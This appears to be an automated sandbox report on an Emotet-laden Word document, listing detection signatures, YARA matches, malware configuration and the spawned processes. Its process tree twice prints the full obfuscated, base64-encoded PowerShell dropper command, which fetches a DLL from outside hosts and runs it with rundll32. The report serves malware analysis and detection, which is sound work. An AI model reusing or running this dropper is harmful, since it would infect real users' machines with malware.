Play interactive tour

Edit tour

Analysis Report Documenten_9274874 8574977265.doc

Overview

General Information

Sample Name:	Documenten_9274874 8574977265.doc
Analysis ID:	336491
MD5:	bc3ed27ffbbac4cc7695d46ebc3b83f1
SHA1:	ef1d0558f18c3b211e9cbd47b95ec495ddebac14
SHA256:	52e89702b8ccddf31e9439639ca20f45dc8e5ef0ea74312573112605b726df1d
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2424 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 1320 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 1228 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2528 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2328 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2868 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2344 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2984 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2108701302.0000000001C26000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
0000000B.00000002.2118205619.0000000000360000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2119457993.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2110989344.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2122389550.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2113546324.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2108539284.0000000000196000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2112508539.0000000000300000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2115211069.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2349226976.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.rundll32.exe.380000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.7e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.360000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.210000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.360000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.220000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.240000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.240000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.320000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.210000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
